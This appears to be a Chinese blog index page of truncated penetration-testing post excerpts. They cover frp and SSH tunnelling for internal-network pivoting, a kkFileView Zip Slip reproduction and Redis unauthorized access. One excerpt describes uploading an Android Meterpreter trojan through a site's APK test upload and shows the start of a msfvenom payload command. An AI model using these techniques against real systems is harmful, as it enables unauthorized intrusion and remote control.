frp是什么frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 在内网渗透中,由于内网主机没有公网ip,本地无法直接对内网访问或扫描,这时可以搭建代理,frp就是一种常用的代理工具。 frp怎么用frp分为服务端和客户端,服务端放在本地可以直接访问的服务器上(通常是自己的公网服务器),客户端放在靶机上。简单配置如下: frps.ini: 1234[common]bind_port = 5000# auth tokentoken = 可选,防止
今儿遇见个站,有个功能是上传apk做兼容性测试,那一看能上传文件执行就想到传马上线 安装msf: 1curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 生成马: 1msfvenom -p android/meterpreter/re
基本所有的机器都有ssh,所以用ssh开隧道是最方便的。 ssh -R:远程->本地->目标1ssh -R [远程主机的监听地址:]远程主机的监听端口:目标主机的ip:目标主机的端口 root@远程主机ip 其中,[远程主机的监听地址:]可以省略,省略后默认是127.0.0.1 这种用法一般是用来做内网穿透的,例如服务器公网ip:123.123.123.123,我要把内网的192.168.1.100的web服务映射出去,就可以: 1ssh -R 0.0.0.0:80:192.168.1.100:80 root@123.123.123.123 要改ssh配置,/etc&
kkFileView是一个基于spring boot搭建的文档在线预览项目。 kkFileView的上传功能在处理压缩包时,没有对获取的文件名进行校验,导致出现了Zip Slip漏洞。 影响版本:v4.2.1v4.2.0,v4.3.0v4.40 漏洞复现先下载存在漏洞的版本https://github.com/kekingcn/kkFileView/tree/v4.2.1 导入idea,构建运行,maven要换源或者挂代理,不然太慢 构造恶意zip包: 123456789101112131415161718import zipfiledef main(): try: bin
redis未授权访问漏洞redis是什么Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 有什么问题redis默认安装都是没有密码的,默认配置里bind 127.0.0.1,如果将bind开放到内网ip或直接0.0.0.0就会造成redis的未授权访问。 和其他数据库一样,redis支持导出备份文件,如果redis是以高权限用户(如root)运行的,就可以通过指定导出路径和文件名覆盖任意文件。而redis导出文件的内容是部分可控的,通
这四篇啥都讲到了 https://mp.weixin.qq.com/s/PuejwrbCi8y81mHHkKITjw https://mp.weixin.qq.com/s/KPr1uyaksp0C_BUlJ9VzXA https://mp.weixin.qq.com/s/fM626MkP5iKCyRDNwKhUKA https://mp.weixin.qq.com/s/GgingD4BnRg2CAN2NyQoVg 实验准备DNS服务器域名有现成的,证书直接从阿里云搞,服务器从野草云搞。 然配置域名解析 为什么非要搭一个域名服务器,不能直接在控制台改解析,因为免费的云解析DNS TTL最小是1